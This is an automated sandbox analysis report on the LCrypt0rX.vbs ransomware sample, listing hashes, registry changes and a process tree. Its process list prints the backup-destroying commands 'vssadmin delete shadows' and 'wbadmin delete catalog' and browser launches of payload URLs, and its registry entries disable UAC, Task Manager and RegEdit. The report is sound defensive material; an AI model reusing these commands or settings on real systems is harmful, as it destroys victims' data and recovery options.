Resubmissions
31-10-2024 08:45
241031-kn28bsvgnj 131-10-2024 08:39
241031-kkgr8avgkn 131-10-2024 08:31
241031-ke7rfssrhx 1031-10-2024 08:31
241031-kep7easrgs 131-10-2024 08:28
241031-kc6rdasrcx 1031-10-2024 08:25
241031-kbss5asrat 1031-10-2024 08:25
241031-kbcf5svepk 131-10-2024 08:22
241031-j9qkzsveln 1031-10-2024 08:15
241031-j5n7cswlbp 10Analysis
-
max time kernel
13s -
max time network
145s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
31-10-2024 08:15
Static task
static1
Behavioral task
behavioral1
Sample
LCrypt0rX.vbs
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
LCrypt0rX.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
LCrypt0rX.vbs
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral4
Sample
LCrypt0rX.vbs
Resource
win11-20241007-en
General
-
Target
LCrypt0rX.vbs
-
Size
22KB
-
MD5
f25a640ad8b8ea3b0f63ae8959c129a1
-
SHA1
eadb43ef97823955f8b30a4e621e5422f8894afe
-
SHA256
3b39fb55fdfa391dc03c40197b88165c18a260bf9b171a46622c9304c7c38d53
-
SHA512
6964a4b78972d0fc0be9bebd2a3752a63b261281920f1b0bac2f9c9fb7215a268b2cb3258975f417df5e790c9c89da4f9ec8015f7e57b1cf0b58d2298249c524
-
SSDEEP
384:t0GbplStxYHQHSH7l+i/HVn2jv1QayXwA+sxQ+E6O:LJR2iY+EF
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" wscript.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2716 wscript.exe 5 2716 wscript.exe 7 2716 wscript.exe -
Blocks application from running via registry modification 3 IoCs
Adds application to list of disallowed applications.
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" wscript.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "msconfig.exe" wscript.exe -
pid Process 2756 wbadmin.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" wscript.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iamthedoom = "C:\\Windows\\System32\\iamthedoom.bat" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpamScript = "C:\\Windows\\System32\\haha.vbs" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wins32BugFix = "C:\\Windows\\System32\\wins32bugfix.vbs" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyStartupScript = "C:\\Users\\Admin\\AppData\\Local\\Temp\\LCrypt0rX.vbs" wscript.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" wscript.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File created C:\Windows\System32\iamthedoom.bat wscript.exe File opened for modification C:\Windows\System32\iamthedoom.bat wscript.exe File created C:\Windows\System32\haha.vbs wscript.exe File opened for modification C:\Windows\System32\haha.vbs wscript.exe File created C:\Windows\System32\wins32bugfix.vbs wscript.exe File opened for modification C:\Windows\System32\wins32bugfix.vbs wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2344 vssadmin.exe -
Kills process with taskkill 64 IoCs
pid Process 11804 taskkill.exe 14980 taskkill.exe 18356 taskkill.exe 26004 taskkill.exe 24016 taskkill.exe 29232 taskkill.exe 7668 taskkill.exe 18860 taskkill.exe 22332 taskkill.exe 13720 taskkill.exe 21000 taskkill.exe 8532 taskkill.exe 12336 taskkill.exe 21300 taskkill.exe 26224 taskkill.exe 18892 taskkill.exe 19804 taskkill.exe 11772 taskkill.exe 3856 taskkill.exe 13068 taskkill.exe 17352 taskkill.exe 21212 taskkill.exe 14584 taskkill.exe 12768 taskkill.exe 21876 taskkill.exe 8156 taskkill.exe 12608 taskkill.exe 14476 taskkill.exe 23684 taskkill.exe 24336 taskkill.exe 25624 taskkill.exe 3660 taskkill.exe 27520 taskkill.exe 8992 taskkill.exe 10564 taskkill.exe 7340 taskkill.exe 15336 taskkill.exe 9480 taskkill.exe 10452 taskkill.exe 29024 taskkill.exe 7528 taskkill.exe 18192 taskkill.exe 12724 taskkill.exe 24544 taskkill.exe 26376 taskkill.exe 18536 taskkill.exe 11236 taskkill.exe 17028 taskkill.exe 14816 taskkill.exe 8684 taskkill.exe 17872 taskkill.exe 4596 taskkill.exe 18552 taskkill.exe 11912 taskkill.exe 3372 taskkill.exe 7896 taskkill.exe 7868 taskkill.exe 7664 taskkill.exe 26524 taskkill.exe 23104 taskkill.exe 18296 taskkill.exe 13244 taskkill.exe 2880 taskkill.exe 12120 taskkill.exe -
Modifies Control Panel 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Control Panel\Mouse wscript.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4DE84911-9760-11EF-81BC-F2088C279AF6} = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe -
Opens file in notepad (likely ransom note) 2 IoCs
pid Process 2200 notepad.exe 5656 notepad.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeBackupPrivilege 1084 vssvc.exe Token: SeRestorePrivilege 1084 vssvc.exe Token: SeAuditPrivilege 1084 vssvc.exe Token: SeBackupPrivilege 2768 wbengine.exe Token: SeRestorePrivilege 2768 wbengine.exe Token: SeSecurityPrivilege 2768 wbengine.exe Token: SeDebugPrivilege 2880 taskkill.exe Token: SeDebugPrivilege 2928 taskkill.exe Token: SeDebugPrivilege 3172 taskkill.exe Token: SeDebugPrivilege 3660 taskkill.exe Token: SeDebugPrivilege 3856 taskkill.exe Token: SeDebugPrivilege 3372 taskkill.exe -
Suspicious use of FindShellTrayWindow 36 IoCs
pid Process 2328 iexplore.exe 2328 iexplore.exe 2904 iexplore.exe 2904 iexplore.exe 2552 iexplore.exe 2552 iexplore.exe 1272 iexplore.exe 1272 iexplore.exe 2476 iexplore.exe 2476 iexplore.exe 3016 iexplore.exe 3016 iexplore.exe 808 iexplore.exe 808 iexplore.exe 2524 iexplore.exe 2524 iexplore.exe 1736 iexplore.exe 1736 iexplore.exe 2344 iexplore.exe 2344 iexplore.exe 2328 iexplore.exe 2328 iexplore.exe 2328 iexplore.exe 2328 iexplore.exe 2328 iexplore.exe 2328 iexplore.exe 2552 iexplore.exe 2552 iexplore.exe 2552 iexplore.exe 2552 iexplore.exe 2524 iexplore.exe 2524 iexplore.exe 2524 iexplore.exe 2524 iexplore.exe 2552 iexplore.exe 2552 iexplore.exe -
Suspicious use of SetWindowsHookEx 56 IoCs
pid Process 3016 iexplore.exe 3016 iexplore.exe 1736 iexplore.exe 1272 iexplore.exe 1736 iexplore.exe 1272 iexplore.exe 2328 iexplore.exe 2328 iexplore.exe 2376 iexplore.exe 2376 iexplore.exe 2344 iexplore.exe 2344 iexplore.exe 2904 iexplore.exe 2904 iexplore.exe 1972 iexplore.exe 1972 iexplore.exe 2264 iexplore.exe 2264 iexplore.exe 2504 iexplore.exe 2504 iexplore.exe 2552 iexplore.exe 2552 iexplore.exe 2476 iexplore.exe 2476 iexplore.exe 808 iexplore.exe 808 iexplore.exe 1476 iexplore.exe 1476 iexplore.exe 2524 iexplore.exe 2524 iexplore.exe 1556 IEXPLORE.EXE 1556 IEXPLORE.EXE 3484 IEXPLORE.EXE 3484 IEXPLORE.EXE 2260 IEXPLORE.EXE 2456 IEXPLORE.EXE 1208 IEXPLORE.EXE 1208 IEXPLORE.EXE 2260 IEXPLORE.EXE 2456 IEXPLORE.EXE 2440 IEXPLORE.EXE 2440 IEXPLORE.EXE 3284 IEXPLORE.EXE 3284 IEXPLORE.EXE 3360 IEXPLORE.EXE 3360 IEXPLORE.EXE 2864 IEXPLORE.EXE 2864 IEXPLORE.EXE 2960 IEXPLORE.EXE 2960 IEXPLORE.EXE 200 IEXPLORE.EXE 200 IEXPLORE.EXE 204 IEXPLORE.EXE 204 IEXPLORE.EXE 2912 IEXPLORE.EXE 2912 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1528 wrote to memory of 2716 1528 WScript.exe 30 PID 1528 wrote to memory of 2716 1528 WScript.exe 30 PID 1528 wrote to memory of 2716 1528 WScript.exe 30 PID 2716 wrote to memory of 2284 2716 wscript.exe 31 PID 2716 wrote to memory of 2284 2716 wscript.exe 31 PID 2716 wrote to memory of 2284 2716 wscript.exe 31 PID 2284 wrote to memory of 2344 2284 cmd.exe 33 PID 2284 wrote to memory of 2344 2284 cmd.exe 33 PID 2284 wrote to memory of 2344 2284 cmd.exe 33 PID 2716 wrote to memory of 3004 2716 wscript.exe 36 PID 2716 wrote to memory of 3004 2716 wscript.exe 36 PID 2716 wrote to memory of 3004 2716 wscript.exe 36 PID 3004 wrote to memory of 2756 3004 cmd.exe 38 PID 3004 wrote to memory of 2756 3004 cmd.exe 38 PID 3004 wrote to memory of 2756 3004 cmd.exe 38 PID 2716 wrote to memory of 2200 2716 wscript.exe 42 PID 2716 wrote to memory of 2200 2716 wscript.exe 42 PID 2716 wrote to memory of 2200 2716 wscript.exe 42 PID 2716 wrote to memory of 2792 2716 wscript.exe 44 PID 2716 wrote to memory of 2792 2716 wscript.exe 44 PID 2716 wrote to memory of 2792 2716 wscript.exe 44 PID 2716 wrote to memory of 2284 2716 wscript.exe 46 PID 2716 wrote to memory of 2284 2716 wscript.exe 46 PID 2716 wrote to memory of 2284 2716 wscript.exe 46 PID 2716 wrote to memory of 224 2716 wscript.exe 47 PID 2716 wrote to memory of 224 2716 wscript.exe 47 PID 2716 wrote to memory of 224 2716 wscript.exe 47 PID 2716 wrote to memory of 2880 2716 wscript.exe 48 PID 2716 wrote to memory of 2880 2716 wscript.exe 48 PID 2716 wrote to memory of 2880 2716 wscript.exe 48 PID 224 wrote to memory of 2928 224 wscript.exe 50 PID 224 wrote to memory of 2928 224 wscript.exe 50 PID 224 wrote to memory of 2928 224 wscript.exe 50 PID 2284 wrote to memory of 1160 2284 wscript.exe 52 PID 2284 wrote to memory of 1160 2284 wscript.exe 52 PID 2284 wrote to memory of 1160 2284 wscript.exe 52 PID 2792 wrote to memory of 1272 2792 cmd.exe 53 PID 2792 wrote to memory of 1272 2792 cmd.exe 53 PID 2792 wrote to memory of 1272 2792 cmd.exe 53 PID 2792 wrote to memory of 1972 2792 cmd.exe 54 PID 2792 wrote to memory of 1972 2792 cmd.exe 54 PID 2792 wrote to memory of 1972 2792 cmd.exe 54 PID 2792 wrote to memory of 2156 2792 cmd.exe 55 PID 2792 wrote to memory of 2156 2792 cmd.exe 55 PID 2792 wrote to memory of 2156 2792 cmd.exe 55 PID 2792 wrote to memory of 2552 2792 cmd.exe 56 PID 2792 wrote to memory of 2552 2792 cmd.exe 56 PID 2792 wrote to memory of 2552 2792 cmd.exe 56 PID 2792 wrote to memory of 1736 2792 cmd.exe 57 PID 2792 wrote to memory of 1736 2792 cmd.exe 57 PID 2792 wrote to memory of 1736 2792 cmd.exe 57 PID 2792 wrote to memory of 2904 2792 cmd.exe 58 PID 2792 wrote to memory of 2904 2792 cmd.exe 58 PID 2792 wrote to memory of 2904 2792 cmd.exe 58 PID 2792 wrote to memory of 3016 2792 cmd.exe 59 PID 2792 wrote to memory of 3016 2792 cmd.exe 59 PID 2792 wrote to memory of 3016 2792 cmd.exe 59 PID 2792 wrote to memory of 2376 2792 cmd.exe 60 PID 2792 wrote to memory of 2376 2792 cmd.exe 60 PID 2792 wrote to memory of 2376 2792 cmd.exe 60 PID 2792 wrote to memory of 2572 2792 cmd.exe 61 PID 2792 wrote to memory of 2572 2792 cmd.exe 61 PID 2792 wrote to memory of 2572 2792 cmd.exe 61 PID 2792 wrote to memory of 2344 2792 cmd.exe 62 -
System policy modification 1 TTPs 15 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\InactivityTimeoutSecs = "0" wscript.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisableCMD = "1" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" wscript.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "msconfig.exe" wscript.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun wscript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System wscript.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System wscript.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LCrypt0rX.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1528 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\LCrypt0rX.vbs" /elevated2⤵
- UAC bypass
- Blocklisted process makes network request
- Blocks application from running via registry modification
- Disables RegEdit via registry modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Modifies Control Panel
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2716 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet3⤵
- Suspicious use of WriteProcessMemory
PID:2284 -
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:2344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin delete catalog -quiet3⤵
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet4⤵
- Deletes backup catalog
PID:2756
-
-
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\READMEPLEASE.txt3⤵
- Opens file in notepad (likely ransom note)
PID:2200
-
-
C:\Windows\System32\cmd.execmd /c ""C:\Windows\System32\iamthedoom.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://languishcharmingwidely.com/22/f4/31/22f431404146fb2f892b30f7d213aea4.js4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1272 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1272 CREDAT:275457 /prefetch:25⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2440
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.msnsndstdyyemkemafgk.dns.army/receipst/vbc.exe?pla4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1972 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1972 CREDAT:275457 /prefetch:25⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:992
-
-
-
C:\Windows\system32\calc.execalc4⤵PID:2156
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.youtube.com/4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2552 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:275457 /prefetch:25⤵
- System Location Discovery: System Language Discovery
